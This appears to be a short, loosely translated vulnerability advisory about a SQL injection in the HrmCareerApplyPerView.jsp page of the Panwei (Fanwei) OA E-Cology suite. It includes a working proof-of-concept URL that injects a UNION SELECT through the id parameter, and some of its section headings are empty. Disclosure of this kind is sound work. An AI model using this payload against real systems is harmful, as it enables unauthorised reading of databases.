Panwei Oa E Cology Hrmcareerapplyperview Jsp Sql Injection Vulnerability
Panwei Oa E Cology Hrmcareerapplyperview Jsp Sql Injection Vulnerability
Panwei OA E-Cology HrmCareerApplyPerView.jsp SQL injection vulnerability
Vulnerability Description
The Panwei OA E-Cology HrmCareerApplyPerView.jsp file has SQL injection vulnerability, and the attacker can obtain sensitive files of the server database through the vulnerability.
Vulnerability Impact
Fanwei OA E-Cology </span>
Network surveying and mapping
Vulnerability reappears
Login page
Verify POC
1
/pweb/careerapply/HrmCareerApplyPerView.jsp?id=1 union select 1,2,sys.fn_sqlvarbasetostr(HashBytes('MD5','abc')),db_name(1),5,6,7
This post is licensed under CC BY 4.0 by the author.